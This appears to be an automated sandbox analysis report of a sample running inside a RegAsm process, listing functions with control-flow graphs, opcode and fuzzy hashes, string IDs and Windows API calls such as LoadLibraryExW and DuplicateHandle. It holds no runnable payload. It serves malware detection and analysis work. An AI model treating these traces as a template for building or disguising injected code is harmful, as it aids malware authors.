                                                      • Opcode ID: 4cdd872ce35f708618c95a0df885d68f3c7b2f6bd4fa181593fddd572182a534
                                                      • Instruction ID: 2518e43236009e36dfe50e571edf124c1834606a0b105a835a6115b74726cdfa
                                                      • Opcode Fuzzy Hash: 4cdd872ce35f708618c95a0df885d68f3c7b2f6bd4fa181593fddd572182a534
                                                      • Instruction Fuzzy Hash: 54229E30B002059FEB55DB65D848A7EBBF6FF89204B14845AE646CB3A2DF75DC01CBA1
                                                      Function 068D4C37 Relevance: 10.4, Strings: 8, Instructions: 429COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 68d4c37-68d4c38 463 68d4c3a-68d4c40 462->463 464 68d4cb2-68d4cb6 463->464 465 68d4c42-68d4c4e 463->465 466 68d4cb8-68d4cc3 464->466 467 68d4cc5 464->467 473 68d4c58-68d4c6f 465->473 469 68d4cca-68d4ccd 466->469 467->469 471 68d4ccf-68d4cd3 469->471 472 68d4d04-68d4e06 469->472 474 68d4cd5-68d4ce0 471->474 475 68d4ce2 471->475 478 68d4c75-68d4c77 473->478 477 68d4ce4-68d4ce6 474->477 475->477 480 68d4cec-68d4cf6 477->480 481 68d4e09-68d4e67 477->481 483 68d4c8f-68d4cb0 478->483 484 68d4c79-68d4c7f 478->484 491 68d4cf7-68d4cfe 480->491 499 68d4e7f-68d4ea1 481->499 500 68d4e69-68d4e6f 481->500 483->491 487 68d4c81 484->487 488 68d4c83-68d4c85 484->488 487->483 488->483 491->472 492 68d4c31-68d4c36 491->492 492->462 505 68d4ea4-68d4ea8 499->505 501 68d4e71 500->501 502 68d4e73-68d4e75 500->502 501->499 502->499 506 68d4eaa-68d4eaf 505->506 507 68d4eb1-68d4eb6 505->507 508 68d4ebc-68d4ebf 506->508 507->508 509 68d4ec5-68d4eda 508->509 510 68d5176-68d517e 508->510 509->505 512 68d4edc 509->512 513 68d50be-68d50e3 512->513 514 68d4f58-68d4f7d 512->514 515 68d5010-68d5033 512->515 516 68d4ee3-68d4f10 512->516 529 68d50e9-68d50ed 513->529 530 68d50e5-68d50e7 513->530 533 68d4f7f-68d4f81 514->533 534 68d4f83-68d4f87 514->534 531 68d5039-68d503d 515->531 532 68d5223-68d5252 515->532 537 68d51ed-68d521c 516->537 538 68d4f16-68d4f20 516->538 542 68d50ef-68d510c 529->542 543 68d510e-68d5131 529->543 541 68d514b-68d5171 530->541 544 68d528f-68d52c6 531->544 545 68d5043-68d504d 531->545 549 68d5259-68d5288 532->549 536 68d4fe5-68d500b 533->536 539 68d4f89-68d4fa6 534->539 540 68d4fa8-68d4fcb 534->540 536->505 537->532 546 68d51b7-68d51e6 538->546 547 68d4f26-68d4f53 538->547 539->536 574 68d4fcd-68d4fd3 540->574 575 68d4fe3 540->575 541->505 542->541 578 68d5149 543->578 579 68d5133-68d5139 543->579 545->549 550 68d5053-68d5082 545->550 546->537 547->505 549->544 581 68d5084-68d5086 550->581 582 68d5090-68d50b9 550->582 583 68d4fd5 574->583 584 68d4fd7-68d4fd9 574->584 575->536 578->541 587 68d513d-68d513f 579->587 588 68d513b 579->588 581->582 582->505 583->575 584->575 587->578 588->578
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                      • API String ID: 0-3886557441
                                                      • Opcode ID: 47163b84288c602f5a1a4b5d5180557dc6364c494c7a65fec51323741840ecb1
                                                      • Instruction ID: 691b99af4f0b2a16204f106c8c425e505d72bab80b7a0cfbaa8c787fceb7193f
                                                      • Opcode Fuzzy Hash: 47163b84288c602f5a1a4b5d5180557dc6364c494c7a65fec51323741840ecb1
                                                      • Instruction Fuzzy Hash: A9E1E330B002049FDB649F66D854A2EBBF2FF88214B11895AE607CB3A5DF75DC01C7A6
                                                      Function 068D1577 Relevance: 7.8, Strings: 6, Instructions: 340COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 595 68d1577-68d1578 596 68d157a-68d1580 595->596 597 68d15f3-68d15f7 596->597 598 68d1582-68d158e 596->598 599 68d15f9-68d1604 597->599 600 68d1606 597->600 606 68d1598-68d15af 598->606 602 68d160b-68d160e 599->602 600->602 604 68d1645-68d1747 602->604 605 68d1610-68d1614 602->605 607 68d1616-68d1621 605->607 608 68d1623 605->608 614 68d15b5-68d15b7 606->614 609 68d1625-68d1627 607->609 608->609 612 68d162d-68d1637 609->612 613 68d174a-68d17a7 609->613 624 68d1638-68d163f 612->624 631 68d17bf-68d17e1 613->631 632 68d17a9-68d17af 613->632 616 68d15cf-68d15f1 614->616 617 68d15b9-68d15bf 614->617 616->624 619 68d15c1 617->619 620 68d15c3-68d15c5 617->620 619->616 620->616 624->604 626 68d1571-68d1576 624->626 626->595 637 68d17e4-68d17e8 631->637 633 68d17b1 632->633 634 68d17b3-68d17b5 632->634 633->631 634->631 638 68d17ea-68d17ef 637->638 639 68d17f1-68d17f6 637->639 640 68d17fc-68d17ff 638->640 639->640 641 68d1abf-68d1ac7 640->641 642 68d1805-68d181a 640->642 642->637 644 68d181c 642->644 645 68d18d8-68d198b 644->645 646 68d1a07-68d1a2c 644->646 647 68d1990-68d19bd 644->647 648 68d1823-68d18d3 644->648 645->637 662 68d1a2e-68d1a30 646->662 663 68d1a32-68d1a36 646->663 669 68d1b36-68d1b77 647->669 670 68d19c3-68d19cd 647->670 648->637 668 68d1a94-68d1aba 662->668 671 68d1a38-68d1a55 663->671 672 68d1a57-68d1a7a 663->672 668->637 673 68d1b00-68d1b2f 670->673 674 68d19d3-68d1a02 670->674 671->668 691 68d1a7c-68d1a82 672->691 692 68d1a92 672->692 673->669 674->637 694 68d1a84 691->694 695 68d1a86-68d1a88 691->695 692->668 694->692 695->692
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q$$q$$q$$q$$q
                                                      • API String ID: 0-2069967915
                                                      • Opcode ID: 6199b3dd6b4a1c0e81759b951fad782f49848c0efaedc425c04d2923b5ce9590
                                                      • Instruction ID: f61e6169698646d8cfb88254391bf736ec66a6aa8b82c4de0efabf8322b13226
                                                      • Opcode Fuzzy Hash: 6199b3dd6b4a1c0e81759b951fad782f49848c0efaedc425c04d2923b5ce9590
                                                      • Instruction Fuzzy Hash: 58C1F434B002059FEB549B65D858A7EBBE6EF89304F14845AE743CB3A2DF75DC018BA1
                                                      Function 0701D1D0 Relevance: 4.0, Strings: 3, Instructions: 226COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1080 701d1d0-701d1f4 1082 701d1f6-701d1f8 1080->1082 1083 701d1fa 1080->1083 1084 701d1fd-701d228 call 701d078 1082->1084 1083->1084 1089 701d2ff-701d318 call 701d078 1084->1089 1092 701d22d-701d23d 1089->1092 1093 701d31e-701d374 1089->1093 1094 701d245-701d247 1092->1094 1095 701d23f-701d243 1092->1095 1121 701d376-701d37a 1093->1121 1122 701d37c-701d381 1093->1122 1096 701d24c-701d24f 1094->1096 1095->1096 1098 701d251-701d253 1096->1098 1099 701d255 1096->1099 1101 701d25a-701d25c 1098->1101 1099->1101 1102 701d27f-701d281 1101->1102 1103 701d25e-701d260 1101->1103 1107 701d283-701d28a 1102->1107 1108 701d296-701d2a6 1102->1108 1105 701d262-701d270 1103->1105 1106 701d275-701d27a 1103->1106 1105->1089 1106->1089 1114 701d292-701d294 1107->1114 1109 701d2a8-701d2ac 1108->1109 1110 701d2ae-701d2b0 1108->1110 1111 701d2b5-701d2ba 1109->1111 1110->1111 1115 701d2c0 1111->1115 1116 701d2bc-701d2be 1111->1116 1114->1089 1117 701d2c5-701d2c7 1115->1117 1116->1117 1119 701d2e2-701d2e8 1117->1119 1120 701d2c9-701d2cd 1117->1120 1124 701d2f4-701d2f8 1119->1124 1125 701d2ea 1119->1125 1128 701d2d2-701d2e1 1120->1128 1123 701d386-701d389 1121->1123 1122->1123 1126 701d38b-701d38d 1123->1126 1127 701d38f 1123->1127 1124->1089 1125->1124 1129 701d394-701d396 1126->1129 1127->1129 1130 701d3b0-701d3ba 1129->1130 1131 701d398-701d39e 1129->1131 1133 701d3c2-701d3c7 1130->1133 1134 701d3bc-701d3c0 1130->1134 1135 701d3a0 1131->1135 1136 701d3aa-701d3ae 1131->1136 1137 701d3cc 1133->1137 1134->1137 1135->1136 1138 701d3e7-701d3ec 1136->1138 1139 701d3cf 1137->1139 1140 701d3d1-701d3d6 1139->1140 1141 701d3d8-701d3e0 1139->1141 1142 701d3e3-701d3e5 1140->1142 1141->1142 1142->1138 1143 701d3ef-701d429 1142->1143 1143->1139 1149 701d42b-701d45a 1143->1149
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq$Hq$LRq
                                                      • API String ID: 0-279333956
                                                      • Opcode ID: fda011cf32cd09b57c71afa25df5e6af0540c850ecc1ef577be5816b3e28e515
                                                      • Instruction ID: 81113aaae33ff4fa97f11076c6f2103a8135d867f12794427edddcbb0e389c0e
                                                      • Opcode Fuzzy Hash: fda011cf32cd09b57c71afa25df5e6af0540c850ecc1ef577be5816b3e28e515
                                                      • Instruction Fuzzy Hash: E47159F27142229FDB559F75C4103BE7BF2AF95200F0446BAE966CB280EB38D901D791
                                                      Function 0701C718 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1152 701c718-701c728 1154 701c760-701c785 1152->1154 1155 701c72a-701c730 1152->1155 1157 701c78c-701c7bb 1154->1157 1156 701c732-701c735 1155->1156 1155->1157 1225 701c738 call 701c711 1156->1225 1226 701c738 call 701c716 1156->1226 1227 701c738 call 701c718 1156->1227 1228 701c738 call 701c7c8 1156->1228 1167 701c7c0-701c7d0 1157->1167 1159 701c73e-701c74c 1162 701c755-701c75d 1159->1162 1167->1167 1168 701c7d2 1167->1168 1169 701c7d4-701c7d9 1168->1169 1170 701c7db-701c820 1168->1170 1169->1170 1229 701c822 call 701c711 1170->1229 1230 701c822 call 701c8c0 1170->1230 1231 701c822 call 701c716 1170->1231 1232 701c822 call 701c718 1170->1232 1233 701c822 call 701c7c8 1170->1233 1176 701c828-701c83e 1178 701c840-701c849 1176->1178 1179 701c84c-701c8b2 1176->1179 1188 701c8b4-701c8ba 1179->1188 1189 701c8bb-701c8bf 1179->1189 1188->1189 1190 701c8c3-701c8db 1188->1190 1191 701c8e1-701c8f5 1190->1191 1192 701c9b3-701c9d6 1190->1192 1195 701c8f7-701c8f9 1191->1195 1196 701c8fe-701c905 1191->1196 1205 701c9d9-701c9f4 1192->1205 1197 701c9ac-701c9b2 1195->1197 1198 701c907 1196->1198 1199 701c90a-701c914 1196->1199 1198->1199 1203 701c923-701c930 1199->1203 1204 701c916-701c91e 1199->1204 1208 701c970-701c97d 1203->1208 1209 701c932-701c934 1203->1209 1204->1197 1211 701c9f6-701c9f7 1205->1211 1214 701c98b-701c998 1208->1214 1215 701c97f-701c981 1208->1215 1234 701c936 call 701cb70 1209->1234 1235 701c936 call 701cb80 1209->1235 1213 701c93c-701c94e 1217 701c950-701c96a 1213->1217 1218 701c96c-701c96e 1213->1218 1221 701c9a4 1214->1221 1222 701c99a 1214->1222 1219 701c989 1215->1219 1217->1197 1218->1197 1219->1197 1221->1197 1236 701c99c call 701d1c0 1222->1236 1237 701c99c call 701d1d0 1222->1237 1224 701c9a2 1224->1197 1225->1159 1226->1159 1227->1159 1228->1159 1229->1176 1230->1176 1231->1176 1232->1176 1233->1176 1234->1213 1235->1213 1236->1224 1237->1224
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (q$Hq$Hq
                                                      • API String ID: 0-3730031680
                                                      • Opcode ID: 8c9dc6976fbdfcca2ee69c06b76ab3e44f1eece856e82df7436da1a5ee9f5049
                                                      • Instruction ID: b4fc3567725cffe912501b2bab418fe6bb75fd64d2f52e8811286aabb8b0a7d9
                                                      • Opcode Fuzzy Hash: 8c9dc6976fbdfcca2ee69c06b76ab3e44f1eece856e82df7436da1a5ee9f5049
                                                      • Instruction Fuzzy Hash: FB4114B0B003059FD714EF79C8545AE7FF6EFC5210B0485AAD40ACB355DB349D0687A2
                                                      Function 0701D1C0 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1335 701d1c0-701d1c8 1336 701d1c9 1335->1336 1337 701d1ca-701d1cd 1336->1337 1338 701d16f-701d172 1336->1338 1337->1336 1341 701d1cf-701d1f4 1337->1341 1339 701d174-701d176 1338->1339 1340 701d178 1338->1340 1342 701d17d-701d17f 1339->1342 1340->1342 1349 701d1f6-701d1f8 1341->1349 1350 701d1fa 1341->1350 1344 701d1b1-701d1b7 1342->1344 1345 701d181-701d18b 1342->1345 1347 701d193-701d198 1345->1347 1348 701d18d-701d191 1345->1348 1351 701d19d-701d1a0 1347->1351 1348->1351 1352 701d1fd-701d228 call 701d078 1349->1352 1350->1352 1353 701d1a2-701d1a5 1351->1353 1354 701d1a8-701d1ae 1351->1354 1359 701d2ff-701d318 call 701d078 1352->1359 1362 701d22d-701d23d 1359->1362 1363 701d31e-701d374 1359->1363 1364 701d245-701d247 1362->1364 1365 701d23f-701d243 1362->1365 1391 701d376-701d37a 1363->1391 1392 701d37c-701d381 1363->1392 1366 701d24c-701d24f 1364->1366 1365->1366 1368 701d251-701d253 1366->1368 1369 701d255 1366->1369 1371 701d25a-701d25c 1368->1371 1369->1371 1372 701d27f-701d281 1371->1372 1373 701d25e-701d260 1371->1373 1377 701d283-701d28a 1372->1377 1378 701d296-701d2a6 1372->1378 1375 701d262-701d270 1373->1375 1376 701d275-701d27a 1373->1376 1375->1359 1376->1359 1384 701d292-701d294 1377->1384 1379 701d2a8-701d2ac 1378->1379 1380 701d2ae-701d2b0 1378->1380 1381 701d2b5-701d2ba 1379->1381 1380->1381 1385 701d2c0 1381->1385 1386 701d2bc-701d2be 1381->1386 1384->1359 1387 701d2c5-701d2c7 1385->1387 1386->1387 1389 701d2e2-701d2e8 1387->1389 1390 701d2c9-701d2cd 1387->1390 1394 701d2f4-701d2f8 1389->1394 1395 701d2ea 1389->1395 1398 701d2d2-701d2e1 1390->1398 1393 701d386-701d389 1391->1393 1392->1393 1396 701d38b-701d38d 1393->1396 1397 701d38f 1393->1397 1394->1359 1395->1394 1399 701d394-701d396 1396->1399 1397->1399 1400 701d3b0-701d3ba 1399->1400 1401 701d398-701d39e 1399->1401 1403 701d3c2-701d3c7 1400->1403 1404 701d3bc-701d3c0 1400->1404 1405 701d3a0 1401->1405 1406 701d3aa-701d3ae 1401->1406 1407 701d3cc 1403->1407 1404->1407 1405->1406 1408 701d3e7-701d3ec 1406->1408 1409 701d3cf 1407->1409 1410 701d3d1-701d3d6 1409->1410 1411 701d3d8-701d3e0 1409->1411 1412 701d3e3-701d3e5 1410->1412 1411->1412 1412->1408 1413 701d3ef-701d429 1412->1413 1413->1409 1419 701d42b-701d45a 1413->1419
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq$LRq
                                                      • API String ID: 0-3298043417
                                                      • Opcode ID: 83f8993cfb32cbf9d5976993f7fdae000784251d3917283169044bcccf1d2cdc
                                                      • Instruction ID: 49e1668fc0111abb7bf9fd8c5efb5c8052b15dd5dc041738caba5ade13514227
                                                      • Opcode Fuzzy Hash: 83f8993cfb32cbf9d5976993f7fdae000784251d3917283169044bcccf1d2cdc
                                                      • Instruction Fuzzy Hash: 563166F1704226BFC7599B3588106BF7FE2AF86240F05466AE852CB350EA34CA01C3E2
                                                      Function 0537AE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1615 537ae30-537ae3f 1616 537ae41-537ae4e call 5379838 1615->1616 1617 537ae6b-537ae6f 1615->1617 1622 537ae64 1616->1622 1623 537ae50 1616->1623 1619 537ae83-537aec4 1617->1619 1620 537ae71-537ae7b 1617->1620 1626 537aec6-537aece 1619->1626 1627 537aed1-537aedf 1619->1627 1620->1619 1622->1617 1673 537ae56 call 537b0b8 1623->1673 1674 537ae56 call 537b0c8 1623->1674 1626->1627 1628 537af03-537af05 1627->1628 1629 537aee1-537aee6 1627->1629 1634 537af08-537af0f 1628->1634 1631 537aef1 1629->1631 1632 537aee8-537aeef call 537a814 1629->1632 1630 537ae5c-537ae5e 1630->1622 1633 537afa0-537afb7 1630->1633 1636 537aef3-537af01 1631->1636 1632->1636 1646 537afb9-537b018 1633->1646 1637 537af11-537af19 1634->1637 1638 537af1c-537af23 1634->1638 1636->1634 1637->1638 1640 537af25-537af2d 1638->1640 1641 537af30-537af39 call 537a824 1638->1641 1640->1641 1647 537af46-537af4b 1641->1647 1648 537af3b-537af43 1641->1648 1666 537b01a-537b060 1646->1666 1649 537af4d-537af54 1647->1649 1650 537af69-537af76 1647->1650 1648->1647 1649->1650 1651 537af56-537af66 call 537a834 call 537a844 1649->1651 1657 537af99-537af9f 1650->1657 1658 537af78-537af96 1650->1658 1651->1650 1658->1657 1668 537b062-537b065 1666->1668 1669 537b068-537b093 GetModuleHandleW 1666->1669 1668->1669 1670 537b095-537b09b 1669->1670 1671 537b09c-537b0b0 1669->1671 1670->1671 1673->1630 1674->1630
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0537B086
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 381be30f1edfb6e3269c27478aee078ead2a1a69bd8b10d739e5f5bdd596c975
                                                      • Instruction ID: 84b0991e47e6a447a14dad4a822323a3861ed6c354146617b37e6116bcef2aee
                                                      • Opcode Fuzzy Hash: 381be30f1edfb6e3269c27478aee078ead2a1a69bd8b10d739e5f5bdd596c975
                                                      • Instruction Fuzzy Hash: 5F7159B0A00B099FD734DF2AD44479ABBF1FF88204F04892DE45AD7A50D779E846CB90
                                                      Function 05540AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05541E02
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 0eb749c32c5a2fcc0ad7a02cff5659c72b85d117167afbcabbd1ed73ac3541e4
                                                      • Instruction ID: 46a06a315abe16b0606a7208067bcbf84a9b70a96d631332ac62750e13244fdb
                                                      • Opcode Fuzzy Hash: 0eb749c32c5a2fcc0ad7a02cff5659c72b85d117167afbcabbd1ed73ac3541e4
                                                      • Instruction Fuzzy Hash: 8C51C0B5D10709DFDB14CF9AC884ADEBFB6BF48314F64812AE819AB210D7719885CF90
                                                      Function 05541CE4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05541E02
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 4cf4a0f0dc8628d7bd12c3e591971da0bbd37972cbbafbace026aa8b79c54ffa
                                                      • Instruction ID: fad19662f2d42a631ae81f27d9eafd0e1b9112877687f981cea87a4f43c01a0d
                                                      • Opcode Fuzzy Hash: 4cf4a0f0dc8628d7bd12c3e591971da0bbd37972cbbafbace026aa8b79c54ffa
                                                      • Instruction Fuzzy Hash: 7D51DFB5C10349DFDB14CF9AC884ADEBFB5BF88314F64812AE819AB210D7719885CF90
                                                      Function 05540BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05544381
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1667540425.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5540000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 0bec460b9a272e728e138503b9be29b0d1ac245230b4702904dbd800bd524ece
                                                      • Instruction ID: d8e0f86bb7ebf8df1a697694952b19c9ae04db81520528c52fe72f58adc8f52d
                                                      • Opcode Fuzzy Hash: 0bec460b9a272e728e138503b9be29b0d1ac245230b4702904dbd800bd524ece
                                                      • Instruction Fuzzy Hash: 2E4106B5900305CFDB14CF99C888BAABBF5FF88718F248559E519AB321D774A841CFA0
                                                      Function 05374248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 053759F1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 95ce0baa1cd3e488acf4ce37f5c9bd41e44f38471fbeac45c9010e6833c5a40d
                                                      • Instruction ID: 173426d99f5ce82730dca1325069be26f5a026543d552ae0d41ba95848e24127
                                                      • Opcode Fuzzy Hash: 95ce0baa1cd3e488acf4ce37f5c9bd41e44f38471fbeac45c9010e6833c5a40d
                                                      • Instruction Fuzzy Hash: D441CE71C0072DCBDB28DFA9C884B8DBBB5BB49314F20816AD408AB250DB756946CF90
                                                      Function 05375935 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 053759F1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 75f0ca27d8895c695caeb899eee3c372528aaa0678e60695c457dbf5982dfe18
                                                      • Instruction ID: 6f5c80008de83c589ccf0664d501d883d3dae1ac8b7767f4c8ed004ce77d648a
                                                      • Opcode Fuzzy Hash: 75f0ca27d8895c695caeb899eee3c372528aaa0678e60695c457dbf5982dfe18
                                                      • Instruction Fuzzy Hash: C441CFB1C0071DCBDB28DFA9C884BCDBBB5BF48314F24816AD418AB250DB756946CF90
                                                      Function 0537A858 Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0537B101,00000800,00000000,00000000), ref: 0537B312
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 9e1462d4ce7ac0c0e0bf4963fcf8ec4321a682808b0e27835d8c8fdf2b9cb836
                                                      • Instruction ID: 1f5a1f2873018046b91f6b46a6a417e54b9a1f4f508ab45186f2238b40e5fb8c
                                                      • Opcode Fuzzy Hash: 9e1462d4ce7ac0c0e0bf4963fcf8ec4321a682808b0e27835d8c8fdf2b9cb836
                                                      • Instruction Fuzzy Hash: CA318EB6C083888FEB21CFAAC8547DEBFF4EB49211F04805AD855AB211D6789545CFA5
                                                      Function 0537C9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0537D2C6,?,?,?,?,?), ref: 0537D387
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: a80b5ff8cae970ab871fb496d2102df78fa971a830e49e041eb114e5d9acf0e6
                                                      • Instruction ID: 30f63424ac55fc46bf2972a11a53e11cd7d279d241ee19c2f212bcfe75bf0388
                                                      • Opcode Fuzzy Hash: a80b5ff8cae970ab871fb496d2102df78fa971a830e49e041eb114e5d9acf0e6
                                                      • Instruction Fuzzy Hash: B521E3B5D0034C9FDB10CF9AD984ADEBBF5EB48320F14841AE918A7310D778A954CFA4
                                                      Function 0537D2F9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0537D2C6,?,?,?,?,?), ref: 0537D387
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 659f65cedbcb7f7d8037cfeaf88d68466cb981341eef9ca6c4dfc0129a82eec2
                                                      • Instruction ID: ce0c1b331dbe73ff6dac1cb0a822e818d5f3a07136b63d82eb5b59212d84be4f
                                                      • Opcode Fuzzy Hash: 659f65cedbcb7f7d8037cfeaf88d68466cb981341eef9ca6c4dfc0129a82eec2
                                                      • Instruction Fuzzy Hash: D221E3B9D002099FDB10CF9AD985ADEBBF4EB48324F14841AE918A3250D378A945CF60
                                                      Function 0537B2A0 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0537B101,00000800,00000000,00000000), ref: 0537B312
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 90c17eaef5aeaef47a59dd8a3b3e1fa4a87518731c7f4ad1a2a8483621291f24
                                                      • Instruction ID: 1df63ce264ba15a9e07f672f4fe87ddad5a731c59370895488291918194b11f7
                                                      • Opcode Fuzzy Hash: 90c17eaef5aeaef47a59dd8a3b3e1fa4a87518731c7f4ad1a2a8483621291f24
                                                      • Instruction Fuzzy Hash: 881114B6C003499FDB20CF9AC844BDEFBF4EB48320F14842AD829A7200C779A545CFA4
